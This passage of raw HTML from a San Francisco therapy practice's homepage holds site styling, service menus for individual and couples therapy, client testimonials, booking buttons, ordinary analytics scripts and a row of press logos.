2/1), only screen and (-webkit-min-device-pixel-ratio: 2), only screen and (min-device-pixel-ratio: 2), only screen and (min-resolution: 2dppx), only screen and (min-resolution: 192dpi) { .synved-social-resolution-normal { display: none; } .synved-social-resolution-hidef { display: inline-block; } } </style> <link rel="stylesheet" href="http://www.psychedinsanfrancisco.com/wp-content/uploads/bb-theme/skin-59c583c7406a0.css" /> <style id="fl-theme-custom-css">.fl-page-nav-right.fl-page-header-fixed .fl-page-nav-wrap .navbar-nav > li > a, .fl-page-header-fixed .fl-page-nav-wrap .navbar-nav > li > a { padding: 4px 6px; } @media (max-width: 1060px) and (min-width: 769px) { .mobile-hidden { display: none !important; } } .alignnone { margin: 0; } a img.alignnone { margin: 0px 0px 0px 0; } .fl-post-feed-post { border-bottom: 0px; margin-bottom: 5px; padding-bottom: 5px; } .fl-post-grid-image img { height: 125px !important; width: 100% !important; } .fl-post-feed-image img { height: 200px !important; width: 100% !important; } .fl-node-570711635bc28 .fl-post-slider-content a { color: #FFFFFF; font-weight: 700; } .radio input[type="radio"], .radio-inline input[type="radio"], .checkbox input[type="checkbox"], .checkbox-inline input[type="checkbox"] { position: relative; margin-left: -20px; margin-top: 4px 9; } .widget_authors img { border-radius: 100px; width:150px; max-height: 150px; padding: 5px; margin: 0px; margin-bottom: 10px; list-style-type: none; align-content: center; } .widgettitle { list-style-type: none; } .widget_authors li { width: 160px; height: 200px; text-align: center; float: left; list-style-type: none;} .fl-builder-content *, .fl-builder-content *:before, .fl-builder-content *:after { list-style-type: none; } .fl-builder-content .fl-node-569ff1e11bb52 a { color: #333333;} .fl-builder-content .fl-node-569ff1e11bb52 h1, .fl-builder-content .fl-node-569ff1e11bb52 h2, .fl-builder-content .fl-node-569ff1e11bb52 h3, .fl-builder-content .fl-node-569ff1e11bb52 h4, .fl-builder-content .fl-node-569ff1e11bb52 h5, .fl-builder-content .fl-node-569ff1e11bb52 h6, .fl-builder-content .fl-node-569ff1e11bb52 h1 a, .fl-builder-content .fl-node-569ff1e11bb52 h2 a, .fl-builder-content .fl-node-569ff1e11bb52 h3 a, .fl-builder-content .fl-node-569ff1e11bb52 h4 a, .fl-builder-content .fl-node-569ff1e11bb52 h5 a, .fl-builder-content .fl-node-569ff1e11bb52 h6 a { color: #333333; </style> <script type="text/javascript"> (function (w, d) { w.biJsUrl = "//app.brightinfo.com/BrightInfoVersion.aspx"; w._biq = w._biq || []; _biq.push("psychedinsanfrancisco-14740-1"); function go() { setTimeout(function () { var bi = document.createElement('script'); bi.type = 'text/javascript'; bi.async = true; bi.src = biJsUrl; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(bi, s); }, 500); } if (w.addEventListener) { w.addEventListener("load", go, false); } else if (w.attachEvent) { w.attachEvent("onload", go); } }(window, document)); </script> <script> (function(h,o,t,j,a,r){ h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)}; h._hjSettings={hjid:125935,hjsv:5}; a=o.getElementsByTagName('head')[0]; r=o.createElement('script');r.async=1; r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv; a.appendChild(r); })(window,document,'//static.hotjar.com/c/hotjar-','.js?sv='); </script> </head> <body class="home page-template-default page page-id-6369 fl-builder fl-preset-default fl-full-width" itemscope="itemscope" itemtype="http://schema.org/WebPage"> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-N4RD9CG" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <div class="fl-page"> <header class="fl-page-header fl-page-header-fixed fl-page-nav-right"> <div class="fl-page-header-wrap"> <div class="fl-page-header-container container"> <div class="fl-page-header-row row"> <div class="fl-page-logo-wrap col-md-3 col-sm-12"> <div class="fl-page-header-logo"> <a href="http://www.psychedinsanfrancisco.com"><img class="fl-logo-img" itemscope itemtype="http://schema.org/ImageObject" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2017/05/Psyched_Logo_Square-e1499084565446.jpg" data-retina="" alt="Psyched in San Francisco" /><meta itemprop="name" content="Psyched in San Francisco" /></a> </div> </div> <div class="fl-page-fixed-nav-wrap col-md-9 col-sm-12"> <div class="fl-page-nav-wrap"> <nav class="fl-page-nav fl-nav navbar navbar-default" role="navigation"> <div class="fl-page-nav-collapse collapse navbar-collapse"> <ul id="menu-main" class="nav navbar-nav navbar-right menu"><li id="menu-item-6378" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-6369 current_page_item menu-item-6378"><a href="http://www.psychedinsanfrancisco.com/">Home</a></li> <li id="menu-item-4197" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4197"><a href="http://www.psychedinsanfrancisco.com/about/">About</a> <ul class="sub-menu"> <li id="menu-item-6708" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6708"><a href="http://www.psychedinsanfrancisco.com/about/starting-therapy/">Starting Therapy</a></li> <li id="menu-item-4199" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4199"><a href="http://www.psychedinsanfrancisco.com/about/contact/">Contact</a></li> <li id="menu-item-5166" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5166"><a href="http://www.psychedinsanfrancisco.com/research/">Research</a></li> </ul> </li> <li id="menu-item-6381" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6381"><a href="http://www.psychedinsanfrancisco.com/about/our-therapists/">Our Therapists</a></li> <li id="menu-item-6382" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6382"><a href="#">Services</a> <ul class="sub-menu"> <li id="menu-item-6383" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6383"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/">Psychotherapy</a></li> <li id="menu-item-6384" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-6384"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/for-individuals/">Individual Psychotherapy</a> <ul class="sub-menu"> <li id="menu-item-3332" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3332"><a href="http://www.psychedinsanfrancisco.com/anxiety/">Overcome Your Anxiety</a></li> <li id="menu-item-3335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3335"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/for-individuals/depression/">Laugh, Love And Sleep Again</a></li> </ul> </li> <li id="menu-item-3479" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3479"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/">Couples Counseling</a> <ul class="sub-menu"> <li id="menu-item-3336" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3336"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/couples-communication-skills/">Learn Healthier Communication</a></li> <li id="menu-item-3435" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3435"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/for-parents/">Overcome The New Parent Slump</a></li> <li id="menu-item-3346" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3346"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/infidelity-recovery/">Get Beyond Betrayal</a></li> <li id="menu-item-3347" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3347"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/premarital-counseling/">Divorce Proof Your Marriage</a></li> <li id="menu-item-3444" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3444"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/take-attachment-style-survey/">Attachment Survey</a></li> </ul> </li> <li id="menu-item-3977" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3977"><a href="http://www.psychedinsanfrancisco.com/teletherapy/">Teletherapy</a></li> <li id="menu-item-773" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-773"><a target="_blank" href="http://www.psychedinsanfrancisco.com/city-resources/">Other City Resources</a></li> </ul> </li> <li id="menu-item-7649" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7649"><a href="http://www.psychedinsanfrancisco.com/schedule-online/">Online Calendar</a></li> </ul> </div> </nav> </div> </div> </div> </div> </div> </header><div class="fl-page-bar"> <div class="fl-page-bar-container container"> <div class="fl-page-bar-row row"> <div class="col-md-12 text-center clearfix"><div class="fl-page-bar-text fl-page-bar-text-1">P: 415-520-5567 | E: [email protected]</div></div> </div> </div> </div><header class="fl-page-header fl-page-header-primary fl-page-nav-right fl-page-nav-toggle-button" itemscope="itemscope" itemtype="http://schema.org/WPHeader"> <div class="fl-page-header-wrap"> <div class="fl-page-header-container container"> <div class="fl-page-header-row row"> <div class="col-md-4 col-sm-12 fl-page-header-logo-col"> <div class="fl-page-header-logo" itemscope="itemscope" itemtype="http://schema.org/Organization"> <a href="http://www.psychedinsanfrancisco.com" itemprop="url"><img class="fl-logo-img" itemscope itemtype="http://schema.org/ImageObject" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2017/05/Psyched_Logo_Square-e1499084565446.jpg" data-retina="" alt="Psyched in San Francisco" /><meta itemprop="name" content="Psyched in San Francisco" /></a> </div> </div> <div class="fl-page-nav-col col-md-8 col-sm-12"> <div class="fl-page-nav-wrap"> <nav class="fl-page-nav fl-nav navbar navbar-default" role="navigation" itemscope="itemscope" itemtype="http://schema.org/SiteNavigationElement"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".fl-page-nav-collapse"> <span>Menu</span> </button> <div class="fl-page-nav-collapse collapse navbar-collapse"> <ul id="menu-main-1" class="nav navbar-nav navbar-right menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-6369 current_page_item menu-item-6378"><a href="http://www.psychedinsanfrancisco.com/">Home</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4197"><a href="http://www.psychedinsanfrancisco.com/about/">About</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6708"><a href="http://www.psychedinsanfrancisco.com/about/starting-therapy/">Starting Therapy</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4199"><a href="http://www.psychedinsanfrancisco.com/about/contact/">Contact</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5166"><a href="http://www.psychedinsanfrancisco.com/research/">Research</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6381"><a href="http://www.psychedinsanfrancisco.com/about/our-therapists/">Our Therapists</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6382"><a href="#">Services</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6383"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/">Psychotherapy</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-6384"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/for-individuals/">Individual Psychotherapy</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3332"><a href="http://www.psychedinsanfrancisco.com/anxiety/">Overcome Your Anxiety</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3335"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/for-individuals/depression/">Laugh, Love And Sleep Again</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3479"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/">Couples Counseling</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3336"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/couples-communication-skills/">Learn Healthier Communication</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3435"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/for-parents/">Overcome The New Parent Slump</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3346"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/infidelity-recovery/">Get Beyond Betrayal</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3347"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/premarital-counseling/">Divorce Proof Your Marriage</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3444"><a href="http://www.psychedinsanfrancisco.com/psychotherapy/couples-therapy/take-attachment-style-survey/">Attachment Survey</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3977"><a href="http://www.psychedinsanfrancisco.com/teletherapy/">Teletherapy</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-773"><a target="_blank" href="http://www.psychedinsanfrancisco.com/city-resources/">Other City Resources</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7649"><a href="http://www.psychedinsanfrancisco.com/schedule-online/">Online Calendar</a></li> </ul> </div> </nav> </div> </div> </div> </div> </div> </header> <div class="fl-page-content" itemprop="mainContentOfPage"> <div class="fl-content-full container"> <div class="row"> <div class="fl-content col-md-12"> <article class="fl-post post-6369 page type-page status-publish hentry" id="fl-post-6369" itemscope="itemscope" itemtype="http://schema.org/CreativeWork"> <div class="fl-post-content clearfix" itemprop="text"> <div class="has-content-area" data-url="http://www.psychedinsanfrancisco.com/" data-title="Psyched in San Francisco | Therapist |Couples Therapy San Francisco"><div class="fl-builder-content fl-builder-content-6369 fl-builder-global-templates-locked" data-post-id="6369"><div class="fl-row fl-row-full-width fl-row-bg-photo fl-node-581e338f456fb fl-row-full-height fl-row-align-center" data-node="581e338f456fb"> <div class="fl-row-content-wrap"> <div class="fl-row-content fl-row-full-width fl-node-content"> <div class="fl-col-group fl-node-581e338f5344d" data-node="581e338f5344d"> <div class="fl-col fl-node-581e338f53721" data-node="581e338f53721" style="width: 100%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-rich-text fl-node-5930eb2ab9d38" data-node="5930eb2ab9d38" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-rich-text"> <h1 style="text-align: left;"><span style="font-size: 48px; color: #003366;"><span style="font-weight: 400;">The business world breeds anxiety and depression. We get it.</span><br /> <span style="font-weight: 400;">Ambition eats good marriages for lunch. We've helped fix many of them.</span></span></h1> <h1 style="text-align: left;"><span style="font-size: 48px;"><span style="color: #003366;">We offer <i>high feedback</i> and <i>low BS </i>therapy and coaching for leaders and entrepreneurs.</span></span></h1> </div> </div> </div><div class="fl-module fl-module-html fl-node-5a5edb3395dd6" data-node="5a5edb3395dd6" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-html"> <style>.spwidget-button-wrapper{text-align: center}.spwidget-button{display: inline-block;padding: 16px 30px;color: #fff !important;background: #229ad2;border: 0;border-radius: 6px;font-size: 24px;font-weight: 600;text-decoration: none}.spwidget-button:hover{background: #d15913}.spwidget-button:active{color: rgba(255, 255, 255, .75) !important;box-shadow: 0 1px 3px rgba(0, 0, 0, .15) inset}</style> <div class="spwidget-button-wrapper"><a href="https://psyched.clientsecure.me" class="spwidget-button" data-spwidget-scope-id="e55c3214-f97d-476b-8ed9-fe4b4cf6bafd" data-spwidget-scope-uri="psyched" data-spwidget-application-id="7c72cb9f9a9b913654bb89d6c7b4e71a77911b30192051da35384b4d0c6d505b" data-spwidget-scope-global data-spwidget-autobind>Schedule A FREE Phone Consultation Here</a></div> <script src="https://widget-cdn.simplepractice.com/assets/integration-1.0.js"></script> </div> </div> </div> </div> </div> </div> </div> </div> </div><div class="fl-row fl-row-full-width fl-row-bg-color fl-node-5930ecb533f4a" data-node="5930ecb533f4a"> <div class="fl-row-content-wrap"> <div class="fl-row-content fl-row-fixed-width fl-node-content"> <div class="fl-col-group fl-node-59ba1b446467d" data-node="59ba1b446467d"> <div class="fl-col fl-node-59ba1b4464eb9 fl-col-small" data-node="59ba1b4464eb9" style="width: 50%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-rich-text fl-node-5930efb020c2e" data-node="5930efb020c2e" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-rich-text"> <p style="text-align: center;"><span style="font-size: 40px; color: #ffffff;">What our clients say about us!</span></p> <p style="text-align: center;"><span style="color: #ffffff; font-size: 14px;">Collected in an anonymous customer survey.</span></p> </div> </div> </div><div class="fl-module fl-module-testimonials fl-node-5930ecb53363f" data-node="5930ecb53363f" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-testimonials-wrap wide"> <div class="fl-testimonials"> <div class="fl-testimonial"> <span style="font-size: 24px; color: #ffffff;">My therapist taught me an enormous amount about myself, and about relationships. I feel much more myself in my life.</span> </div> <div class="fl-testimonial"> <span style="font-size: 24px; color: #ffffff;">My therapist is effective and compassionate. I like the online publication and listening project. Plus, online booking options are very helpful.</span> </div> <div class="fl-testimonial"> <span style="font-size: 24px; color: #ffffff;">My therapist is experienced and addresses very difficult issues in a respectful and nurturing manner. This is our third try with a therapist and has been, by far, the best.</span> </div> <div class="fl-testimonial"> <span style="font-size: 24px; color: #ffffff;">I am in the best mental and emotional shape I've ever been in and I am filled with gratitude for PSYCHED. I feel like my life and my problems are manageable, and I'm way more functional, content, wise, purposeful, and joyful.</span> </div> <div class="fl-testimonial"> <span style="font-size: 24px; color: #ffffff;">PSYCHED helped me center my stress and be a better person.</span> </div> <div class="fl-testimonial"> <span style="font-size: 24px; color: #ffffff;">I think everyone should work with a therapist at some point in their life, and working with psyched was a life changing experience for me.</span> </div> </div> <div class="fl-slider-next"></div> <div class="fl-slider-prev"></div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-59ba1b4464efe fl-col-small" data-node="59ba1b4464efe" style="width: 50%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-video fl-node-59ba1e9bbeae2" data-node="59ba1e9bbeae2" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-video fl-embed-video" itemscope itemtype="http://schema.org/VideoObject"> <iframe width="1280" height="720" src="https://www.youtube.com/embed/hDSLwX9rmu4" frameborder="0" allowfullscreen></iframe></div> </div> </div> </div> </div> </div> <div class="fl-col-group fl-node-59ba241351130" data-node="59ba241351130"> <div class="fl-col fl-node-59ba2413519e1" data-node="59ba2413519e1" style="width: 100%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-html fl-node-5a5edc4a5161c" data-node="5a5edc4a5161c" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-html"> <style>.spwidget-button-wrapper{text-align: center}.spwidget-button{display: inline-block;padding: 16px 30px;color: #fff !important;background: #229ad2;border: 0;border-radius: 6px;font-size: 24px;font-weight: 600;text-decoration: none}.spwidget-button:hover{background: #d15913}.spwidget-button:active{color: rgba(255, 255, 255, .75) !important;box-shadow: 0 1px 3px rgba(0, 0, 0, .15) inset}</style> <div class="spwidget-button-wrapper"><a href="https://psyched.clientsecure.me" class="spwidget-button" data-spwidget-scope-id="e55c3214-f97d-476b-8ed9-fe4b4cf6bafd" data-spwidget-scope-uri="psyched" data-spwidget-application-id="7c72cb9f9a9b913654bb89d6c7b4e71a77911b30192051da35384b4d0c6d505b" data-spwidget-scope-global data-spwidget-autobind>Access Our Online Calendar Here</a></div> <script src="https://widget-cdn.simplepractice.com/assets/integration-1.0.js"></script> </div> </div> </div> </div> </div> </div> </div> </div> </div><div class="fl-row fl-row-full-width fl-row-bg-none fl-node-56ce19c6d9aa1" data-node="56ce19c6d9aa1"> <div class="fl-row-content-wrap"> <div class="fl-row-content fl-row-full-width fl-node-content"> <div class="fl-col-group fl-node-56ce1b772dd17" data-node="56ce1b772dd17"> <div class="fl-col fl-node-56ce1b772e0ff" data-node="56ce1b772e0ff" style="width: 100%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-rich-text fl-node-56ce1b69a3ed7" data-node="56ce1b69a3ed7" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-rich-text"> <p style="text-align: center;"><span style="font-size: 40px;">As Seen In</span></p> </div> </div> </div> </div> </div> </div> <div class="fl-col-group fl-node-56ce1a1c0dbfc" data-node="56ce1a1c0dbfc"> <div class="fl-col fl-node-56ce1a26e90cc fl-col-small" data-node="56ce1a26e90cc" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-56ce1a6602687" data-node="56ce1a6602687" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-png"> <a href="https://www.fastcompany.com/3038935/difficult-conversations/how-to-deal-with-emotionally-difficult-situations-at-work" target="_self" itemprop="url"> <img class="fl-photo-img wp-image-3591 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/fastcompany.png" alt="fastcompany" itemprop="image" srcset="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/fastcompany.png 150w, http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/fastcompany-100x53.png 100w" sizes="(max-width: 150px) 100vw, 150px" /> </a> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-56ce1a20e8597 fl-col-small" data-node="56ce1a20e8597" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-56ce1a93a86a6" data-node="56ce1a93a86a6" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-jpg"> <a href="http://www.latimes.com/local/california/la-me-sidewalk-talk-20150601-story.html" target="_blank" itemprop="url"> <img class="fl-photo-img wp-image-4517 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/la_times.jpg" alt="la_times" itemprop="image" srcset="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/la_times.jpg 150w, http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/la_times-100x53.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </a> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-56ce1a1c0e045 fl-col-small" data-node="56ce1a1c0e045" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-56ce1aa04565a" data-node="56ce1aa04565a" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-png"> <a href="http://www.wsj.com/articles/how-active-listening-makes-both-sides-of-a-conversation-feel-better-1421082684" target="_blank" itemprop="url"> <img class="fl-photo-img wp-image-3393 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/wallstreetjournal.png" alt="wallstreetjournal" itemprop="image" srcset="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/wallstreetjournal.png 150w, http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/wallstreetjournal-100x53.png 100w" sizes="(max-width: 150px) 100vw, 150px" /> </a> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-56ce1a1c0e128 fl-col-small" data-node="56ce1a1c0e128" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-56ce1aac57a3b" data-node="56ce1aac57a3b" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-png"> <img class="fl-photo-img wp-image-3408 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/bayareaparent.png" alt="bayareaparent" itemprop="image" srcset="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/bayareaparent.png 150w, http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/bayareaparent-100x53.png 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-56ce1a1c0e209 fl-col-small" data-node="56ce1a1c0e209" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-56ce1abd9e067" data-node="56ce1abd9e067" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-png"> <img class="fl-photo-img wp-image-3392 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/huffingtonpost.png" alt="huffingtonpost" itemprop="image" srcset="http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/huffingtonpost.png 150w, http://www.psychedinsanfrancisco.com/wp-content/uploads/2014/10/huffingtonpost-100x53.png 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-56ce1a1c0e2e5 fl-col-small" data-node="56ce1a1c0e2e5" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-56ce1ac98e4f8" data-node="56ce1ac98e4f8" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-jpg"> <img class="fl-photo-img wp-image-4468 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/kqed1.jpg" alt="kqed" itemprop="image" srcset="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/kqed1.jpg 150w, http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/kqed1-100x53.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-56ce1a1c0e3c4 fl-col-small" data-node="56ce1a1c0e3c4" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-56ce1ad656270" data-node="56ce1ad656270" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-jpg"> <img class="fl-photo-img wp-image-4473 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/sf_chronicle_logo.jpg" alt="sf_chronicle_logo" itemprop="image" srcset="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/sf_chronicle_logo.jpg 150w, http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/sf_chronicle_logo-100x53.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-56ce1a1c0e49e fl-col-small" data-node="56ce1a1c0e49e" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-56ce1ae22a10b" data-node="56ce1ae22a10b" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-jpg"> <a href="https://archive.org/details/KPIX_20150508_010000_KPIX_5_News_at_6pm?q=%22mike+sugerman%22+%22therapist%22#start/1554/end/1614" target="_blank" itemprop="url"> <img class="fl-photo-img wp-image-4467 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/cbslocal.jpg" alt="cbslocal" itemprop="image" srcset="http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/cbslocal.jpg 150w, http://www.psychedinsanfrancisco.com/wp-content/uploads/2013/07/cbslocal-100x53.jpg 100w" sizes="(max-width: 150px) 100vw, 150px" /> </a> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-576057cba1ed3 fl-col-small" data-node="576057cba1ed3" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-576058801a77b" data-node="576058801a77b" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-png"> <a href="https://www.washingtonpost.com/news/inspired-life/wp/2016/06/01/its-not-quite-free-therapy-but-if-you-need-someone-to-talk-to-these-strangers-will-listen/" target="_blank" itemprop="url"> <img class="fl-photo-img wp-image-6684 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2016/01/washington-post-e1494130758159.png" alt="washington post" itemprop="image" /> </a> </div> </div> </div> </div> </div> </div> <div class="fl-col fl-node-57692d421bdbb fl-col-small" data-node="57692d421bdbb" style="width: 10%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-photo fl-node-57692d4acd958" data-node="57692d4acd958" data-animation-delay="0.0"> <div class="fl-module-content fl-node-content"> <div class="fl-photo fl-photo-align-center" itemscope itemtype="http://schema.org/ImageObject"> <div class="fl-photo-content fl-photo-img-jpg"> <a href="http://www.nbcbayarea.com/profiles/local/SABLETESTBay-Area-Proud-309385971.html" target="_blank" itemprop="url"> <img class="fl-photo-img wp-image-6702 size-full" src="http://www.psychedinsanfrancisco.com/wp-content/uploads/2016/01/NBC-Bay-area-e1494130843177.jpg" alt="NBC Bay area" itemprop="image" /> </a> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div><div class="fl-row fl-row-full-width fl-row-bg-none fl-node-593b2e28b31bd" data-node="593b2e28b31bd"> <div class="fl-row-content-wrap"> <div class="fl-row-content fl-row-full-width fl-node-content"> <div class="fl-col-group fl-node-593ca62942dad" data-node="593ca62942dad"> <div class="fl-col fl-node-593ca629434e8" data-node="593ca629434e8" style="width: 100%;"> <div class="fl-col-content fl-node-content"> <div class="fl-module fl-module-heading 